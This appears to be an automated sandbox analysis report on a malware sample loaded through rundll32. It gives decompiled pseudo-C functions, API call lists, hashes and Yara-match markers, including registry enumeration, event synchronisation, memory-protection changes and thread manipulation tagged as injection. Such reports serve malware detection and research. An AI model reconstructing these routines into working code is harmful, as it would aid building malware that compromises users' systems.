                                          • Instruction ID: f6d618f27fc6a443e5db907080e72c35678bdaef1ccbf9f17e1fcc7819e54939
                                          • Opcode Fuzzy Hash: 9ab89c97c2ab909c9cf5b00b779ade5171428ade523fa860de1c3cb795b53e02
                                          • Instruction Fuzzy Hash: F8518071B01E1ABBEF15EBA8DC84A5E73E8EB04718F1C4EA5E501D7141EBB4BD408B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048970AE Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 22%
                                          			E048970AE(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E04894DF6(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E04894C73(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E04894DF6((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x489a318 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                          0x048970b5
                                          0x048970bc
                                          0x048970c1
                                          0x048970c4
                                          0x048970cb
                                          0x048970ce
                                          0x048970d1
                                          0x048970d6
                                          0x048970db
                                          0x0489722f
                                          0x04897231
                                          0x04897233
                                          0x04897238
                                          0x04897238
                                          0x048970e1
                                          0x048970e4
                                          0x048970e7
                                          0x048970e9
                                          0x048970e9
                                          0x048970ed
                                          0x00000000
                                          0x00000000
                                          0x048970f1
                                          0x0489711d
                                          0x04897122
                                          0x04897124
                                          0x04897124
                                          0x04897127
                                          0x0489712a
                                          0x0489712a
                                          0x0489712c
                                          0x00000000
                                          0x048970f7
                                          0x048970f9
                                          0x04897118
                                          0x04897118
                                          0x0489712f
                                          0x0489712f
                                          0x04897130
                                          0x04897130
                                          0x04897133
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04897133
                                          0x048970fd
                                          0x04897144
                                          0x04897148
                                          0x04897222
                                          0x04897224
                                          0x04897224
                                          0x04897225
                                          0x04897228
                                          0x00000000
                                          0x04897228
                                          0x04897151
                                          0x04897162
                                          0x04897166
                                          0x0489721e
                                          0x00000000
                                          0x0489721e
                                          0x0489716c
                                          0x0489716f
                                          0x04897173
                                          0x04897177
                                          0x0489717c
                                          0x04897214
                                          0x04897214
                                          0x00000000
                                          0x0489721a
                                          0x04897187
                                          0x04897190
                                          0x048971a4
                                          0x048971ab
                                          0x048971c0
                                          0x048971c6
                                          0x048971ce
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x048971d0
                                          0x048971d0
                                          0x048971d0
                                          0x048971d7
                                          0x048971df
                                          0x00000000
                                          0x00000000
                                          0x048971e1
                                          0x048971ea
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x048971ec
                                          0x048971ee
                                          0x048971f1
                                          0x048971f1
                                          0x048971f4
                                          0x048971f8
                                          0x048971fb
                                          0x04897201
                                          0x04897204
                                          0x0489720b
                                          0x00000000
                                          0x04897187
                                          0x04897102
                                          0x0489710a
                                          0x04897110
                                          0x04897112
                                          0x04897112
                                          0x04897115
                                          0x04897117
                                          0x00000000
                                          0x04897117
                                          0x048970f1
                                          0x04897137
                                          0x0489713c
                                          0x0489713e
                                          0x0489713e
                                          0x04897141
                                          0x04897141
                                          0x00000000

                                          APIs
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • lstrcpy.KERNEL32(69B25F45,00000020), ref: 048971AB
                                          • lstrcat.KERNEL32(69B25F45,00000020), ref: 048971C0
                                          • lstrcmp.KERNEL32(00000000,69B25F45), ref: 048971D7
                                          • lstrlen.KERNEL32(69B25F45), ref: 048971FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                          • String ID:
                                          • API String ID: 3214092121-3916222277
                                          • Opcode ID: 3499e85d9d5042cd271c5d29423e143773bd00be1264cfa5e8d8742645b22009
                                          • Instruction ID: 46d887718f6fdd9e32deea04e0a37d67c6462ea0a860b16c41847a2e9a28349f
                                          • Opcode Fuzzy Hash: 3499e85d9d5042cd271c5d29423e143773bd00be1264cfa5e8d8742645b22009
                                          • Instruction Fuzzy Hash: 2451AD31A10908EFDF25CF99C8846ADBBF6FF45314F188A5AE815EB201C770AE41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04891666 Relevance: 7.6, APIs: 5, Instructions: 96synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04891666(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				long _t14;
				void* _t18;
				WCHAR* _t19;
				long _t20;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0x489a310; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x489a348; // 0x9ad5a8
				_t3 = _t8 + 0x489b87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E04894B16(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x489a34c, 1, 0, _t30);
					E04894C73(_t30);
				}
				_t12 =  *0x489a2fc; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t14 = E04892384(_t32, 0); // executed
					_t31 = _t14;
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t18 = E04896DB6(); // executed
					if(_t18 != 0) {
						goto L12;
					}
					_t19 = StrChrW( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 =  &(_t19[1]);
					}
					_t20 = E04893E6C(0,  *_t32, _t19, 0); // executed
					_t31 = _t20;
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								FindCloseChangeNotification(_t25); // executed
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

















                                          0x04891667
                                          0x0489166e
                                          0x04891678
                                          0x0489167c
                                          0x04891682
                                          0x04891691
                                          0x04891698
                                          0x0489169c
                                          0x048916ae
                                          0x048916b0
                                          0x048916b0
                                          0x048916b5
                                          0x048916bc
                                          0x04891713
                                          0x04891713
                                          0x04891719
                                          0x0489171b
                                          0x0489171b
                                          0x04891720
                                          0x04891725
                                          0x04891729
                                          0x0489173b
                                          0x0489173b
                                          0x0489173f
                                          0x04891745
                                          0x04891745
                                          0x00000000
                                          0x048916cc
                                          0x048916cc
                                          0x048916d3
                                          0x00000000
                                          0x00000000
                                          0x048916da
                                          0x048916e2
                                          0x048916e6
                                          0x048916ea
                                          0x048916ea
                                          0x048916f2
                                          0x048916f7
                                          0x048916fb
                                          0x048916ff
                                          0x04891754
                                          0x0489175a
                                          0x0489175a
                                          0x0489170d
                                          0x04891711
                                          0x04891748
                                          0x0489174a
                                          0x0489174d
                                          0x0489174d
                                          0x00000000
                                          0x0489174a
                                          0x04891711
                                          0x00000000
                                          0x048916fb

                                          APIs
                                            • Part of subcall function 04894B16: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05249DA0,00000000,?,?,69B25F44,00000005,0489A00C,4D283A53,?,?), ref: 04894B4C
                                            • Part of subcall function 04894B16: lstrcpy.KERNEL32(00000000,00000000), ref: 04894B70
                                            • Part of subcall function 04894B16: lstrcat.KERNEL32(00000000,00000000), ref: 04894B78
                                          • CreateEventA.KERNEL32(0489A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,04892AA1,?,?,?), ref: 048916A7
                                            • Part of subcall function 04894C73: RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          • StrChrW.SHLWAPI(04892AA1,00000020,61636F4C,00000001,00000000,?,?,00000000,?,04892AA1,?,?,?), ref: 048916DA
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,04892AA1,00000000,00000000,?,00000000,?,04892AA1,?,?,?), ref: 04891707
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,04892AA1,?,?,?), ref: 04891735
                                          • FindCloseChangeNotification.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,04892AA1,?,?,?), ref: 0489174D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait$ChangeCloseCreateEventFindFreeHeapNotificationlstrcatlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 3294472205-0
                                          • Opcode ID: 8c1738e4fcefcb9486c98d5eeffc2c0d4bda559de3beef1c13b1ca687238f1a1
                                          • Instruction ID: 4a8818394f300cf827a4544b6228f1d1f83c3e2fbb77e0b253636b288ea2cb2e
                                          • Opcode Fuzzy Hash: 8c1738e4fcefcb9486c98d5eeffc2c0d4bda559de3beef1c13b1ca687238f1a1
                                          • Instruction Fuzzy Hash: 6421E632708F537BEF315AA89C88A6AB3D9EB88B54B0D0F29F911E7144DB75EC018751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5EEA4 Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B6BAC0: RegCreateKeyA.ADVAPI32(80000001,0614B7F0,?), ref: 00B6BAD5
                                            • Part of subcall function 00B6BAC0: lstrlen.KERNEL32(0614B7F0,00000000,00000000,00B7806E,?,?,?,00B56B9D,00000001,00000000,?), ref: 00B6BAFE
                                          • RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,748FD3B0,76D85520,?,?,?,00B521C2,?), ref: 00B5EEDC
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5EEF0
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,00B521C2,?,?,?), ref: 00B5EF0A
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00B521C2,?,?,?), ref: 00B5EF26
                                          • RegCloseKey.KERNEL32(?,?,?,?,00B521C2,?,?,?), ref: 00B5EF34
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                                          • String ID:
                                          • API String ID: 1633053242-0
                                          • Opcode ID: 00d8bac31bb294bfcc3e9675880853b624feeabb93652b2b67631447c56b789e
                                          • Instruction ID: 29d0e7ad829d0a91392aa9c4501f8a23ad3387b6b507b614816c75137aeb3839
                                          • Opcode Fuzzy Hash: 00d8bac31bb294bfcc3e9675880853b624feeabb93652b2b67631447c56b789e
                                          • Instruction Fuzzy Hash: 921149B6510209BFEF059F94DC84CEE7BBEEB48355B1404A6F90593220DB319E949B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B54345 Relevance: 7.5, APIs: 5, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,?,69B25F44,69B25F44,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?,00000000,?), ref: 00B54366
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B5437F
                                          • OpenProcess.KERNEL32(00000400,00000000,69B25F44,?,69B25F44,69B25F44,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?), ref: 00B5439C
                                          • IsWow64Process.KERNEL32(?,00000000,?,69B25F44,69B25F44,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?,00000000), ref: 00B543AD
                                          • FindCloseChangeNotification.KERNEL32(?,?,00B65886,00000000,00000000,69B25F44,00000000,?,?,00B5335A,?,00000000,?), ref: 00B543C0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$AddressChangeCloseFindHandleModuleNotificationOpenProcWow64
                                          • String ID:
                                          • API String ID: 1712524627-0
                                          • Opcode ID: ea40e502a3f31f4635b6ff8fe41be50a7ba6032d526a9553c0a4c0da29a95f83
                                          • Instruction ID: a7fd02207b6d9e380dcff2fc16778e5f4b5d6e8a836065bba016d9dfd7f758ec
                                          • Opcode Fuzzy Hash: ea40e502a3f31f4635b6ff8fe41be50a7ba6032d526a9553c0a4c0da29a95f83
                                          • Instruction Fuzzy Hash: BB015771900208EFDB11EF68DC489AA7BF8FB8474671042A9E909E3220EB304E89DB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5A0F2 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualProtect.KERNEL32(00000000,00000000,00000040,00B51765,?,?,00000000,?,00000000,?,?,00B51765,00000000,00000000), ref: 00B5A117
                                          • GetLastError.KERNEL32(?,00000000,?,00000000,?,?,00B51765,00000000,00000000), ref: 00B5A11F
                                          • VirtualQuery.KERNEL32(00000000,?,0000001C,?,00000000,?,00000000,?,?,00B51765,00000000,00000000), ref: 00B5A136
                                          • VirtualProtect.KERNEL32(00000000,00000000,-2C9B417C,00B51765,?,00000000,?,00000000,?,?,00B51765,00000000,00000000), ref: 00B5A15B
                                          • SetLastError.KERNEL32(?,?,00000000,?,00000000,?,?,00B51765,00000000,00000000), ref: 00B5A164
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Virtual$ErrorLastProtect$Query
                                          • String ID:
                                          • API String ID: 148356745-0
                                          • Opcode ID: 4ad5b522154fa3497026663e6ff43c16dcdc3c58da156bc99257e8d22f08e0ad
                                          • Instruction ID: 2a5f6f68a0d3df803020271367849d4d1be21a87060343456a65e0bfeddb994c
                                          • Opcode Fuzzy Hash: 4ad5b522154fa3497026663e6ff43c16dcdc3c58da156bc99257e8d22f08e0ad
                                          • Instruction Fuzzy Hash: C9012972500209FF9F119F95DC4499ABBBDFF19251B004066FA05E3120DB71D995DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5EAAC Relevance: 6.1, APIs: 4, Instructions: 110threadsynchronizationinjectionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.NTDLL ref: 00B5EADA
                                          • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 00B5EB64
                                          • WaitForSingleObject.KERNEL32(00000064), ref: 00B5EB72
                                          • SuspendThread.KERNEL32(?), ref: 00B5EB85
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                                          • String ID:
                                          • API String ID: 3168247402-0
                                          • Opcode ID: 5bba965c84f4e27a7270c514a4232f1ad4252afb04e0d409185a976432ec6629
                                          • Instruction ID: 9c59035a79fdea018cdd5f6b1975a363e3c9243af97d2415a9025b4c615e90d2
                                          • Opcode Fuzzy Hash: 5bba965c84f4e27a7270c514a4232f1ad4252afb04e0d409185a976432ec6629
                                          • Instruction Fuzzy Hash: 11418F71108301AFE721DF54C881E6BBBE9FF88311F0049ADFAA592161D731EA59CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04891000 Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SysAllocString.OLEAUT32(80000002), ref: 0489105D
                                          • SysAllocString.OLEAUT32(04896ECE), ref: 048910A1
                                          • SysFreeString.OLEAUT32(00000000), ref: 048910B5
                                          • SysFreeString.OLEAUT32(00000000), ref: 048910C3
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: ff481f07cd22fb7267288a3f9a588188016a9c0cce1aeb070eaa81d20963eec5
                                          • Instruction ID: 71ccef0a269bd293d0ff6cb7e2341cd031b45f4b25e88c61424b613c34d22b03
                                          • Opcode Fuzzy Hash: ff481f07cd22fb7267288a3f9a588188016a9c0cce1aeb070eaa81d20963eec5
                                          • Instruction Fuzzy Hash: 83311AB190464ABFDF04DF98D8848AE7BF9FB48340B14892AE905D7250D676AD41CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0489737F Relevance: 6.1, APIs: 4, Instructions: 98registrysynchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0489737F(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E04894DF6(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32); // executed
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E04894C73(_v28);
							goto L17;
						}
						_t42 = E04896E20(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E04894C73(_v24);
						_v20 = _v16;
						_t47 = E04894DF6(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x489a30c, 0) == 0x102);
				goto L16;
			}

















                                          0x0489737f
                                          0x04897399
                                          0x0489739c
                                          0x0489739f
                                          0x048973a2
                                          0x048973a5
                                          0x048973ab
                                          0x048973af
                                          0x04897489
                                          0x0489748d
                                          0x0489748d
                                          0x048973b8
                                          0x048973bf
                                          0x048973c4
                                          0x048973c9
                                          0x0489747e
                                          0x04897481
                                          0x00000000
                                          0x04897487
                                          0x048973cf
                                          0x048973d2
                                          0x048973d9
                                          0x048973e3
                                          0x048973ec
                                          0x048973f2
                                          0x048973fa
                                          0x04897432
                                          0x0489746c
                                          0x04897472
                                          0x04897474
                                          0x04897474
                                          0x04897476
                                          0x04897479
                                          0x00000000
                                          0x04897479
                                          0x04897447
                                          0x0489744c
                                          0x04897450
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04897450
                                          0x048973ff
                                          0x0489740e
                                          0x00000000
                                          0x00000000
                                          0x04897413
                                          0x0489741c
                                          0x0489741f
                                          0x04897424
                                          0x04897429
                                          0x04897404
                                          0x04897404
                                          0x00000000
                                          0x04897404
                                          0x0489742d
                                          0x00000000
                                          0x0489742d
                                          0x04897401
                                          0x00000000
                                          0x04897452
                                          0x0489745f
                                          0x00000000

                                          APIs
                                          • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,04892A82,?), ref: 048973A5
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • RegEnumKeyExA.KERNEL32(?,?,?,04892A82,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,04892A82), ref: 048973EC
                                          • WaitForSingleObject.KERNEL32(00000000,?,?,?,04892A82,?,04892A82,?,?,?,?,?,04892A82,?), ref: 04897459
                                          • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,04892A82,?), ref: 04897481
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                                          • String ID:
                                          • API String ID: 3664505660-0
                                          • Opcode ID: 3209810b42881d2fd95649f0e4c32064f1d2973a4c409d852a5e02cae0c95e64
                                          • Instruction ID: 40607bc6de6a9744da5fa75d3ea80cbffcc0a7b2e2b3a04333fcaeea8e29ad92
                                          • Opcode Fuzzy Hash: 3209810b42881d2fd95649f0e4c32064f1d2973a4c409d852a5e02cae0c95e64
                                          • Instruction Fuzzy Hash: 2C316971D00919EFDF21AFA9C8448EFFFB9EB44714F284A26E951F2161D2742E40DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04895803 Relevance: 6.1, APIs: 4, Instructions: 87memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E04895803(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				void* _t26;
				intOrPtr _t30;
				intOrPtr _t37;
				intOrPtr* _t43;
				void* _t44;
				void* _t47;
				intOrPtr* _t49;
				void* _t50;
				intOrPtr _t51;

				_t47 = __edx;
				_t44 = __ecx;
				_t43 = _a16;
				_t49 = __eax;
				_t22 =  *0x489a348; // 0x9ad5a8
				_t2 = _t22 + 0x489b682; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t43);
				_t51 =  *0x489a3e0; // 0x5249ba8
				_push(0x800);
				_push(0);
				_push( *0x489a2d8);
				if( *0x489a2ec >= 5) {
					_t26 = RtlAllocateHeap(); // executed
					if(_t26 == 0) {
						L6:
						_a4 = 8;
						L7:
						if(_a4 != 0) {
							L10:
							 *0x489a2ec =  *0x489a2ec + 1;
							L11:
							return _a4;
						}
						_t52 = _a16;
						 *_t49 = _a16;
						_t50 = _v8;
						 *_t43 = E04892087(_t52, _t50); // executed
						_t30 = E04896D7F(_t50, _t52); // executed
						if(_t30 != 0) {
							 *_a8 = _t50;
							 *_a12 = _t30;
							if( *0x489a2ec < 5) {
								 *0x489a2ec =  *0x489a2ec & 0x00000000;
							}
							goto L11;
						}
						_a4 = 0xbf;
						E04893F62();
						HeapFree( *0x489a2d8, 0, _t50);
						goto L10;
					}
					_t37 = E0489636D(_a4, _t47, _t51,  &_v48,  &_v8,  &_a16, _t26);
					L5:
					_a4 = _t37;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t37 = E048959E2(_a4, _t44, _t47, _t51,  &_v48,  &_v8,  &_a16, _t38);
				goto L5;
			}
















                                          0x04895803
                                          0x04895803
                                          0x0489580a
                                          0x04895811
                                          0x04895815
                                          0x0489581a
                                          0x04895825
                                          0x0489582b
                                          0x0489583b
                                          0x04895840
                                          0x04895842
                                          0x04895848
                                          0x0489586c
                                          0x04895874
                                          0x04895891
                                          0x04895891
                                          0x04895898
                                          0x0489589c
                                          0x048958d6
                                          0x048958d6
                                          0x048958dc
                                          0x048958e3
                                          0x048958e3
                                          0x0489589e
                                          0x048958a1
                                          0x048958a3
                                          0x048958b0
                                          0x048958b2
                                          0x048958b9
                                          0x048958f0
                                          0x048958f5
